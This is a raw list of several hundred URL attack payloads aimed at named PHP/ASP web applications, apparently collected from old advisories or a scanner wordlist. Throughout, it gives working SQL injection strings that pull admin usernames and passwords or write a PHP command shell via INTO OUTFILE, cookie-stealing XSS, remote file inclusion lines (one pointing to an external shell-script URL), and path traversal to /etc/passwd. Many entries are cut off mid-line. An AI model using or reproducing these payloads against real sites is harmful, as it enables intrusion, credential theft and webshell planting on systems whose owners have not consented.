/view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2
/view_doc.php?view_doc=-1'%20union%20select%201,2/*
/admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
/admin/print_order.php?order_id=<script>alert(document.cookie);</script>
/view_order.php?order_id=<script>alert(document.cookie);</script>
/admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript>
/admin/nav.php?la_search_home=<script>alert(document.cookie);</script>
/admin/image.php?image=<script>alert(document.cookie);</script>
/admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script>
/admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script>
/admin/header.inc.php?charset='><script>alert(document.cookie);</script>
/footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>
/[path]/home.php?msg=Successfully%20updated&alert=[xss]
/index.php3?Application_Root=http
/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>
/parse/parser.php?WN_BASEDIR=http
/[PATH]/index.php
/[PATH]/process_login.php
/[Script Path]/include/config.inc.php?lvc_include_dir=http
/include/new-visitor.inc.php?lvc_include_dir=http
/geotarget/script.php?anp_path=http
/[path]/includes/functions_kb.php?phpbb_root_path=http
/[path]/includes/bbcb_mg.php?phpbb_root_path=http
/details.php?page=%BF%27%22%28&file=1
/search.php?query=%BF%27%22%28
/[path]/funk.php?id="><script>alert('test!')</script><
/tem.php?action="><script>alert('test!')</script><
/[path]/uss.php?action="><script>alert('test!')</script>
/templates/deluxe/cp/sig.php?settings[smilies]=on&templatefolder=[file]%00
/[ path ]/functions.php?s[phppath]=[shell
/shopping-cart-software/cart.php?m=product_list&pageNumber=&c=190&v=[&sortBy=[xss]&search=[xss]
/hw3.php?daysonly=0).phpinfo().(
/?x=2&kategori=11&id=-1%20union+select+id,kullanici_adi,sifre+from+admin
/catalog/admin/banner_manager.php?page=1[XSS-code]
/catalog/admin/banner_statistics.php?page=1[XSS-code]
/catalog/admin/countries.php?page=1[XSS-code]
/catalog/admin/currencies.php?page=1[XSS-code]
/catalog/admin/languages.php?page=1[XSS-code]
/catalog/admin/manufacturers.php?page=1[XSS-code]
/catalog/admin/newsletters.php?page=1[XSS-code]
/catalog/admin/orders_status.php?page=1[XSS-code]
/catalog/admin/products_attributes.php?page=1[XSS-code]
/catalog/admin/products_expected.php?page=1[XSS-code]
/catalog/admin/reviews.php?page=1[XSS-code]
/catalog/admin/specials.php?page=1[XSS-code]
/catalog/admin/stats_products_purchased.php?page=1[XSS-code]
/catalog/admin/stats_products_viewed.php?page=1[XSS-code]
/catalog/admin/tax_classes.php?page=1[XSS-code]
/catalog/admin/tax_rates.php?page=1[XSS-code]
/catalog/admin/zones.php?page=1[XSS-code]
/[scriptPath]/index.php?includeDir=http
/gadget/login.php?up_login=admin&up_pass=wrongpass')%20or%20(%20'1'%20=%20'1'%20AND%20login%20=%20'admin&up_num_tasks=100%20UNION%20select%20*%20FROM%20tasks
/[path]/index.php?query=<script>alert(1)</script>&type=simple
/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20
/[scerpitPath]/index.php?isearch_path=http
/[deepcms_path]/index.php?ConfigDir=http
/mod/users/init.php?PHPWS_SOURCE_DIR=http
/mod/users/class/users.php?PHPWS_SOURCE_DIR=http
/mod/users/class/Cookie.php?PHPWS_SOURCE_DIR=http
/mod/users/class/forms.php?PHPWS_SOURCE_DIR=http
/mod/users/class/Groups.php?PHPWS_SOURCE_DIR=http
/mod/users/class/http
/core/Calendar.php?PHPWS_SOURCE_DIR=http
/core/DateTime.php?PHPWS_HOME_DIR=http
/core/http
/core/ImgLibrary.php?PHPWS_SOURCE_DIR=http
/core/Manager.php?PHPWS_SOURCE_DIR=http
/core/Template.php?PHPWS_SOURCE_DIR=http
/core/EZform.php?PHPWS_SOURCE_DIR=http
/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE
/<path_to_hastymail>/html/compose.php HTTP/1.1
/getimg.php?img=http
/PHPLibrary-1.5.3/example/lib/grid3.lib.php?cfg_dir=http
/blueshoes-4.6_public/blueshoes-4.6/lib/googlesearch/GoogleSearch.php?APP[path][lib]=http
/tagit2b/tagmin/delTagUser.php?configpath=http
/mysqldumper_path/sql.php?db=[Xss codes]
/gcards/admin/addnews.php?languagefile=shell code
/path/claroline/exercice/testheaderpage.php?rootSys=http
/path/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http
/path/claroline/tracking/userLog.php?rootSys=http
/phplist_path/?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/[path]/config.php?fullpath=|SCRIPT-URL|
/MamboV4.6RC2/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http
/MamboV4.6RC2/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http
/[PATHSCR&#304;PT]/index.php?page[path]=http
/[PATHTOSCR&#304;PT]/admin.php?page[path]=http
/[PATHTOSCR&#304;PT]/rss.php?page[path]=http
/[PATHTOSCR&#304;PT]/rss2.php?page[path]=http
/[PATHTOSCR&#304;PT]/rdf.php?page[path]=http
/[PATHTOSCR&#304;PT]/files/mainfile.php?page[path]=http
/modules/newbb/search.php?term=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&andor=exact&searchin=both&uname=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&%3D%22sortby%22=p.post_time+desc&since=100&submit=Search
/[path]/adodb/adodb.inc.php?path=|SCRIPT-URL|
/webshell4/login.php?login=\"><script>alert(document.cookie);</script>&err=invalid+login+name+or+password
/[path]/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=[shell]
/[path]/calcul-page.php?home=[shell]
/goopgallery/index.php?next=%BB&gallery=demo+gallery+1I=Bunny.JPG">[XSS-CODE]
/goopgallery/index.php?gallery=demo+gallery+1I=Bunny.JPG">[XSS-CODE]
/[path]/lib/php/phphtmllib-2.5.4/examples/example6.php?phphtmllib=[shell]
/phplist/index.php?p="><script>alert(1);</script>
/index.php?session=0&action=>"><ScRiPt%20%0a%0d>alert(775195196)%3B</ScRiPt>
/rpc.php?cmd=display_get_requesters&id=[ticket#]
/[p-book_path]/admin.php?pb_lang=http
/[p-book_path]/pbook.php?pb_lang=http
/[scerpitPath]/gorum/dbproperty.php?appDirName=http
/index.php?action=login2"><script>alert('xss-by-b0rizQ')</script>
/ATutor/documentation/common/frame_toc.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
/ATutor/documentation/common/print.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
/ATutor/documentation/common/search.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
/ATutor/documentation/common/search.php?req_lang=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
/ATutor/documentation/common/vitals.inc.php?req_lang=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
/ATutor/include/classes/module/module.class.php?row[dir_name]=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
/[path]/conf-php.php?root_path=http
//smumdadotcom_ascyb_alumni/mod.php?mod=katalog&op=search&query=[xss]
/mod.php?mod=../../../../../../../../../../../../../etc/passwd%00
/modules/rmgs/images.php?kw=<script>alert(document.cookie)</script>&q=search
/article.htm?cat=<script>alert("fix your bugs!")</script>
/wakka.php"> <input type="hidden" name="wiki" value="ParametresUtilisateur"> <input type="hidden" name="action" value="login"> <input type="hidden" name="name" value=">"><script>alert('XSS Vulnerable');</script>" <input type="submit" value="Submit" name="submit"> </form> </body> </html> <html> <body> <form method="POST" enctype="application/x-www-form-urlencoded" action="http
/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?
/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?
/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?
/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?
/simpnews/admin/index.php?vigilon=>"><ScRiPt>alert("XSS")</ScRiPt>
/simpnews/admin/pwlost.php/%3E%22%3E%3CScRiPt%3Ealert("XSS")%3C/ScRiPt%3E
/[CommentIT_path]/classes/class_admin.php?PathToComment=http
/[CommentIT_path]/classes/class_comments.php?PathToComment=http
/{path}/init.php?lvc_include_dir=SHELL
/user.php?uname=1&module=NS-LostPassword&op=[code]
/consult/miniseul.php?cheminmini=http
/[path]/treeviewclasses.php=shell?
/ig_shop/change_pass.php?id="<script>alert(document.cookie);</script>
/torrentfluxroot/dir.php?dir=\.\./\.\./\.\./etc/
/[Ban_Path]/modules/bannieres/bannieres.php?chemin=Sh3ll.txt?
/search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >/*]&1763905137=1&1121320991=1
/db/DataReaderWriter.php?CONFIG_DB=evilscripts?
/db/PollDB.php?CONFIG_DATAREADERWRITER=evilscripts?
/fetchsettings.php?toroot=shell
/fstyles.php?toroot=shell
/path/aff_news.php?chemin=shell.txt?
/index_2.php?major_rls=major_rls29
/cms_images/js/htmlarea/htmlarea.php?vigilon=>"><ScRiPt>alert("XSS")</ScRiPt>
/i-accueil.php?chemin=http
/i-index.php?chemin=http
/include/configfunctions.php?tsep_config[absPath]=
/getFeed/inc/session.php?PROJECT_ROOT=http
/index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,%22%3C?php%20passthru($_GET['cmd'])%20?%3E%22,5,6,7,8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.php'/langs/uk/fork.php?cmd=ls
/newsp/lib/class.Database.php?path=http
/path/index.php?Bloks={XSS}
/path/index.php?Newnews={XSS}
/path/index.php?lBlok={XSS}
/path/index.php?foooot={XSS}
/path/MobileNews.php?Newnews={XSS}
/path/MobileNews.php?newmsgs={XSS}
/path/MobileNews.php?Bloks={XSS}
/path/polls.php?Newnews={XSS}
/path/send.php?cats={XSS}
/path/up.php?footer={XSS}
/path/cp/index.php?pagenav={XSS}
/simplog/archive.php?blogid=
/simplog/archive.php?blogid=1&pid=
/simplog/index.php?blogid=
/simplog/archive.php?blogid=1&pid=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/[AGuest Path]/admin.php?include_path=Shell?cmd
/index.php?rns=[xss]
/install.php3?repertoire=ShElL.txt?
/modules/wfdownloads/newlist.php?newdownloadshowdays=[XSS]
/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*
/public/code/cp_forum_view.php?fmode=top&topid=&lt;/textarea&gt;'"><script>alert(document.cookie)</script> 
/public/code/cp_forum_view.php?fmode=top&topid=53&forid=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/public/code/cp_dpage.php?choosed_language=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/public/code/cp_show_ec_products.php?order_field=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/public/code/cp_users_online.php?order_field=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/public/code/cp_links_search.php?orderdir=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/public/code/cp_dpage.php?choosed_language=[sql]
/public/code/cp_news.php?choosed_language=[sql]
/public/code/cp_news.php?news_category=[sql]
/public/code/cp_forum_view.php?choosed_language=[sql]
/public/code/cp_edit_user.php?choosed_language=[sql]
/public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
/public/code/cp_newsletter.php?choosed_language=[sql] 
/public/code/cp_links.php?links_category=[sql]
/public/code/cp_links.php?choosed_language=[sql]
/public/code/cp_contact_us.php?choosed_language=[sql]
/public/code/cp_show_ec_products.php?product_category_id=[sql] http
/public/code/cp_login.php?choosed_language=[sql]
/public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
/public/code/cp_codice_fiscale.php?choosed_language=[sql]
/public/code/cp_links_search.php?orderdir=[sql]
/public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
/public/code/cp_show_ec_products.php?order_field[]= 
/public/code/cp_show_page_help.php?hp[]=
/?errno=1006&errmsg=%3Cscript%20language=javascript%3Ealert('xss')%3C/script%3E
/index.php?=[xss]
/path/localization/languages.lib.php3?ChatPath=../../etc/passwd
/index.php?page=../../../../../../../../../../etc/passwd%00
/newsdetails.php?neid=[sql]
/slistl.php?slid=[sql]
/path/avatar.php?ChatPath=../../etc/passwd
/path/colorhelp_popup.php?ChatPath=../../etc/passwd
/path/color_popup.php?ChatPath=../../etc/passwd
/index.php?ChatPath=../../etc/passwd
/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd
/path/avatar.php?ChatPath=../../etc/passwd
/path/lib/index.lib.php?ChatPath=../../etc/passwd
/path/logs.php?L=../../etc/passwd
/path/phpMyChat.php3?ChatPath=../../etc/passwd
/simplog/archive.php?blogid=
/simplog/archive.php?blogid=1&pid=
/simplog/index.php?blogid=
/index.php?showRevisions=[xss]
/newsletters/edition.php?tk=[SQL]&find=1&search=suchen
/PATH/action/ls.php?lang=en&action=list&start=&lt;/textarea&gt;'"><script>alert(document.cookie)</script> http
/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&keyword=&lt;/textarea&gt;'"><script>alert(document.cookie)</script> 
/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&keyword=&search_area=&lt;/textarea&gt;'"><script>alert(document.cookie)</script> 
/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&keyword=&search_area=&search_type=&lt;/textarea&gt;'"><script>alert(document.cookie)</script> 
/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&keyword=&search_area=&search_type=&infield=&lt;/textarea&gt;'"><script>alert(document.cookie)</script> 
/PATH/action/ls.php?lang=en&action=list&start=20&CAT_ID=1&keyword=&search_area=&search_type=&search_order=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/PATH/action/ls.php?lang=en&action=list&start=[sql] 
/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&keyword=&search_area=[sql] http
/PATH/action/ls.phpvariables =/PATH/action/ls.php?lang=en&action=list&CAT_ID=1&keyword=1&infield=[sql]
/articles/comments.php?article_id='[sql]
/articles/article.php?op=save&article_id='[sql]
/articles/pages.php?page_id='[sql]
/bitweaver/blogs/list_blogs.php?sort_mode=-98
/bitweaver/fisheye/list_galleries.php?sort_mode=-98
/bitweaver/fisheye/index.php?sort_mode=-98
/bitweaver/wiki/orphan_pages.php?sort_mode=-98
/bitweaver/wiki/list_pages.php?find=&sort_mode=-98
//index.php?option=contact&Itemid=10&task=category&id=<ScRiPt%20%0a%0d>alert(764606807)%3B</ScRiPt>
/Exophpdesk_PATH/pipe.php?lang_file=[Evil Script]
/wp-includes/functions.php?file=http
/frontend/files/seldir.html?dir=[XSS]
/frontend/htaccess/newuser.html?user=[XSS]&pass=&dir=A VALID FOLDER
/frontend/htaccess/newuser.html?user=[XSS]&pass=&dir=[XSS]
/?_task=');alert(%22XSS%22)//
/phpdebug_PATH/test/debug_test.php?debugClassLocation=attacker's_script
/[path]/dlback.php?dl=fullback
/announce.php?left=[xss]
/[path]/blog.php?page="><script>alert('Xmors')</script><
/[path]/add_block.php?action="><script>alert('Xmors')</script>< http
/extensions/googiespell/googlespell_proxy.php?lang=[xss]
/[path]/admin/articles.php?edit="><script>alert('Xmors')</script><
/[path]/admin/comments.php?edit="><script>alert('Xmors')</script><
/[path]/admin/users.php?add="><script>alert('Xmors')</script><
/phpmyadmin/db_create.php?token=your_token&reload=1&db=[double xss(2 followed xss)]
/phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss] 
/phpmyadmin/querywindow.php token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]
/phpmyadmin/sql.php?db=information_schema&token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/scripts/check_lang.php 
/themes/darkblue_orange/layout.inc.php 
/index.php?lang[]= 
/index.php?target[]= 
/index.php?db[]= 
/index.php?goto[]= 
/left.php?server[]= 
/index.php?table[]= 
/server_databases.php?token=your_token&sort_by=" 
/index.php?db=information_schema&token=your_token&tbl_group[]= http
/sql.php?back[]=
/frontend/x/net/dnslook.html?dns=[XSS]
/upload/bin/download.php?filename=../conf/users.conf
/upload/bin/download.php?filename=/etc/passwd
/vbulletin/admincp/index.php?do=buildnavprefs&nojs=0&prefs= "><script>alert("insanity")</script> http
/[path]/list.php?FADDR="><script>alert("XSS");</script>
/[Path]/inc/design.inc.php?dir[inc]=http
/[path]/admin/admincore.php?msg="><script>alert('Xmors')</script><
/[path]/admin/comments.php?month="><script>alert('Xmors')</script>< 
/[path]/admin/entries.php?month="><script>alert('Xmors')</script><
/[path]/admin/logs.php?page="><script>alert('Xmors')</script><
/admin.php?act=../../../../../../../../../../../../../../etc/passwd%00
/index.php?dir=../../../../../../etc/passwd
/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/wher
/show_news.php?KAPDA="><script>alert()</script>
/rss.php?rss_news_include_url=aAa&rss_title=<script>alert(document.cookie)</script>
/support_path/ticketview.php?id=[xss]
/support_path/ticketview.php?email=[xss]
/support_path/ticketview.php?cmd=deletepost&id=[xss]
/support_path/ticketview.php?cmd=deletepost&email=[xss]
/support_path/ticket.php?email=[xss]
/[Script_Path]/apb_common.php?APB_SETTINGS['apb_path']=Shell.txt?
/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=Shell.txt?
/sp_index.php?dir=[xss]
/thumbs.php?page='>
/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
/frontend/x/files/createdir.html?dir=XSS
/frontend/x/err/erredit.html?dir=XSS
/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS
/frontend/x/files/createfile.html?dir=XSS
//<www.example.com>/<b2epath>/inc/VIEW/errors/_404_not_found.page.php?baseurl=[XSS]&app_name=[XSS]
//<www.example.com>/<b2epath>/inc/VIEW/errors/_410_stats_gone.page.php?app_name=[XSS]
//<www.example.com>/<b2epath>/inc/VIEW/errors/_referer_spam.page.php?ReqURI=[XSS]&app_name=[XSS]
/polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/*
/index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN (SELECT BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM ipb_gallery_images )
/index.php?show=-1'+%55NION+%53ELECT+1,+'Admin+Panel\',+level%3d4,+waffe%3d\'SQL+Injection',+2,+3,+'
/[path]/index.php?qb_path=shellcode.txt?
/[path]/faq.php?qb_path=shellcode.txt?
/[path]/delete.php?qb_path=shellcode.txt?
/[path]/contact.php?qb_path=shellcode.txt?
/[path]/about.php?qb_path=shellcode.txt?
/[path-to-cutenews]/?result=[XSS]
/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]
/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]
/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]
/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]
/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]
/includes/elements/spellcheck/spellwin.php?pspell_loaded=1&js=<http
/<path_to_ismail>/error.php?error=XSS%20attack%3Cscript%3Ealert(document.cookie);%3C/script%3E
/path/up.php?Taaa=[XSS]
/path/polls.php?pollhtml=[xss]
/path/polls.php?Bloks=[Xss]
/prikazInformacije.php?IDStranicaPodaci=[code]
/frontend/xtest/mail/manage.html?account=
/scripts2/changeemail?domain=d[XSS]
/scripts2/limitbw?domain=[XSS]
/scripts2/dofeaturemanager?action=editfeature&feature=XSS
/scripts/rearrangeacct?domain=[XSS]
/[script_messagerie_path]/lire-avis.php?aa=[SQL INJECTION]
//[script_messagerie_path]/existepseudo.php?pseudo=[XSS]
/[script_messagerie_path]/existeemail.php?email=[XSS]
/[script_messagerie_path]/Contact/contact.php?pageName=</title>[XSS]
/[script_messagerie_path]/Contact/contact.php?cssform=">[XSS]<foo
/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=[SQL INJECTION]
/[script_annonce_path]/erreurinscription.php?email=[XSS]
/[script_annonce_path]/Templates/admin.dwt.php?email=[XSS]
/[script_annonce_path]/Templates/commun.dwt.php?email=[XSS]
/[script_annonce_path]/Templates/membre.dwt.php?email=[XSS]
/[script_annonce_path]/admin/admin_config/Aide.php?email=[XSS]
/[script_annonce_path]/email.php?id=[SQL INJECTION]
/[script_annonce_path]/voirannonce.php?no=[SQL INJECTION]
/[kdpics_path]/index.php3?page=galeries&categories=[XSS]
/[kdpics_path]/galeries.inc.php3?categories=[XSS]
/[script_news_path]/admin/change.php?pseudo=[XSS]&email=">[XSS]&date=[XSS]&sujet=[XSS]&message=[XSS]&site=">[XSS]<foo
/[script_news_path]/lire-avis.php?aa=[SQL INJECTION]
/[script_news_path]/lire-avis.php?aa=[XSS]
/index.php?mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=51&cntnt01searchinput=Enter+Search..."><script>alert(document.cookie)</script>&cntnt01submit=Submit
/form.php?floap=modfich&do=[FILE]
/form.php?floap=modfich&chem=[FILE]
/index.php?cuve=[XSS]
/form.php?floap=ajoutfich&cuve=[XSS]
/form.php?floap=modfich&chem=[XSS]
/form.php?floap=modfich&do=[XSS]
/form.php?floap=rename&chem=[XSS]
/form.php?floap=rename&do=[XSS]
/form.php?floap=copy&chem=[XSS]
/form.php?floap=copy&do=[XSS]
/form.php?floap=chmod&chem=[XSS]
/form.php?floap=chmod&do=[XSS]
/calendar/export_handler.php?format=<body+onload=alert(1111)>&id=200 http
/miniwebshop/modules/viewcategory.php?catname=[xss]
/[Path]/lib/htm2php.php?filename=../../../../../etc/passwd
/[Path]/sitetools/htm2php.php?filename=../../../../../etc/passwd
/calendar/export_handler.php?format=<body+onload=alert(1111)>&id=200 http
/add_comment.php?id_news=[XSS]
/show_news.php?id_news=[XSS]
/show_news.php?id_news=[SQL INJECTION]
/shownews.php?nid=>'><ScRiPt%20%0a%0d>alert(1261667191)%3B</ScRiPt>
/index.php?l=[XSS]
/run.php?dir=SHELL?&file=
/classes/ircbot.class.php?dir=SHELL?&file=
/[pc_path]/parser/plugs/counter.php?PHPCMS_INCLUDEPATH=[cmd_url]
/[pc_path]/parser/parser.php?PHPCMS_INCLUDEPATH=[cmd_url]/
/[pc_path]/parser/include/class.parser_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
/[pc_path]/parser/include/class.session_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
/[pc_path]/parser/include/class.edit_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
/[pc_path]/parser/include/class.http_indexer_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
/[pc_path]/parser/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
/[pc_path]/parser/include/class.search_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
/[pc_path]/parser/include/class.lib_indexer_universal_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
/[pc_path]/parser/include/class.layout_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
/phpicalendar/day.php?cal=all_calendars_combined971 &getdate=20061225"><script>alert()</script>
/phpicalendar/month.php?cal=all_calendars_combined971 &getdate=20061225"><script>alert()</script>
/phpicalendar/year.php?cal=all_calendars_combined971 &getdate=20061225"><script>alert()</script>
/phpicalendar/week.php?cal=all_calendars_combined971 &getdate=20061225"><script>alert()</script>
/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork &getdate=19700102&query=ss"><script>alert()</script>&submit.x=11&submit.y=15 
/phpicalendar/search.php?cpath="><script>alert()</script>&cal=Home %2CUS%2BHolidays%2CWork&getdate=19700102&query=ss&submit.x=11&submit.y=12 
/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork &getdate=19700102"><script>alert()</script>&query=ss&submit.x=11&submit.y=12
/phpicalendar/rss/index.php?cal=Home,US+Holidays,Work &getdate=20061225"><script>alert()</script>
/phpicalendar/print.php?cal=Home,US+Holidays,Work &getdate=20061225%22%3E%3Cscript%3Ealert()%3C/script%3E&printview=day
/phpicalendar/preferences.php?cal=Home,US+Holidays,Work &getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E <html> <head></head> <body> <title>PHP icalendar XSS in preferences.php PoC</title> <p><a href="http
/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dhttp%3A/swt.js%3E%3C/script%3E http
/vcard/gbrowse.php?cat_id=9&sortby=[XSS]
/ashop/catalogue.php?cat=[XSS]
/ashop/catalogue.php?exp=[XSS]
/ashop/basket.php?cat=[XSS]
/ashop/search.php?searchstring=[XSS]
/ashop/shipping.php?action=checkout=[XSS]
/ashop/shipping.php?action=[XSS]
/cart-path/admin/editcatalogue.php?cat=[XSS]
/cart-path/admin/salesadmin.php?resultpage=[XSS]
/BlogPath/search.asp?q=<script>alert(document.cookie);</script>
/comment.php&comcat=gb&subid=-1'%20UNION%20SELECT%201,1,1,1,1,1,user_pw,1%20from%20PHPKIT_USER_TABLE%20where%20%20user_id=1/*
/path/admin/admin_password.php?_config[site_path]=http
/path/admin/add_welcome_text.php?_config[site_path]=http
/path/admin/admin_email.php?_config[site_path]=http
/path/admin/add_templates.php?_config[site_path]=http
/path/admin/admin_paypal_email.php?_config[site_path]=http
/path/admin/approve_member.php?_config[site_path]=http
/path/admin/delete_member.php?_config[site_path]=http
/path/admin/index.php?_config[site_path]=http
/path/admin/list_members.php?_config[site_path]=http
/path/admin/membership_pricing.php?_config[site_path]=http
/path/admin/send_email.php?_config[site_path]=http
/path/include/config.php?_config[site_path]=http
/path/include/db_config.php?_config[site_path]=http
/path/user/add_category.php?_config[site_path]=http
/path/user/add_news.php?_config[site_path]=http
/path/user/change_catalog_template.php?_config[site_path]=http
/path/user/couple_milestone.php?_config[site_path]=http
/path/user/couple_profile.php?_config[site_path]=http
/path/user/delete_category.php?_config[site_path]=http
/path/user/index.php?_config[site_path]=http
/path/user/login.php?_config[site_path]=http
/path/user/logout.php?_config[site_path]=http
/path/user/register.php?_config[site_path]=http
/path/user/upload_photo.php?_config[site_path]=http
/path/user/user_catelog_password.php?_config[site_path]=http
/path/user/user_email.php?_config[site_path]=http
/path/user/user_extend.php?_config[site_path]=http
/path/user/user_membership_password.php?_config[site_path]=http
/info.php?s[phppath]=http
/[editxPATH]/editx/edit_address.php?include_dir=HTTP
/phpBB2/privmsg.php", "_self", "POST");
/exploit.swf" frameborder="0" height="0" width="0"></iframe>
/ezboxx/custom/piczoom.asp?pic=[XSS]
/ezboxx/boxx/user-upload.asp?nocatname=[XSS] - Login required
/ezboxx/indexes/newscomments.asp?iid=[XSS]
/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+username+from+members))
/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=notnumber
/ezboxx/boxx/knowledgebase.asp?iid=1&Cat=notnumber 
/AIOCP/public/code/cp_downloads.php?did=[sql]
/AIOCP/public/code/cp_downloads.php?did='+UNION+SELECT+NULL,NULL,NULL,NULL,user_id,NULL,NULL,user_name,NULL,user_password,NULL,NULL,NULL,NULL,NULL+FROM+aiocp_users+WHERE+user_name<>'Anonymous
/liens_dynamiques/admin/adminlien.php3 
/liens.php3?ajouter=1 
/jax_petitionbook.php?language=../../example_file.xxx%00?
/smileys.php?language=../../example_file.xxx%00? 
/[dt_guestbook_v1-directory]/index.php?submit=1&error[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/INDEXU_PATH/upgrade.php?pflag=upgrade&true&gateway=[XSS]
/INDEXU_PATH/suggest_category.php?error_msg=[XSS]
/INDEXU_PATH/user_detail.php?u=[XSS]
/INDEXU_PATH/tell_friend.php?friend_name=[XSS]
/INDEXU_PATH/tell_friend.php?friend_email=[XSS]
/INDEXU_PATH/tell_friend.php?error_msg=[XSS]
/INDEXU_PATH/tell_friend.php?my_name=[XSS]
/INDEXU_PATH/tell_friend.php?my_email=[XSS]
/INDEXU_PATH/tell_friend.php?id=[XSS]
/INDEXU_PATH/sendmail.php?error_msg=[XSS]
/INDEXU_PATH/sendmail.php?email=[XSS]
/INDEXU_PATH/sendmail.php?name=[XSS]
/INDEXU_PATH/sendmail.php?subject=[XSS]
/INDEXU_PATH/send_pwd.php?email=[XSS]
/INDEXU_PATH/send_pwd.php?error_msg=[XSS]
/INDEXU_PATH/send_pwd.php?username=[XSS]
/INDEXU_PATH/search.php?keyword=[XSS]
/INDEXU_PATH/register.php?error_msg=[XSS]
/INDEXU_PATH/register.php?username=[XSS]
/INDEXU_PATH/register.php?password=[XSS]
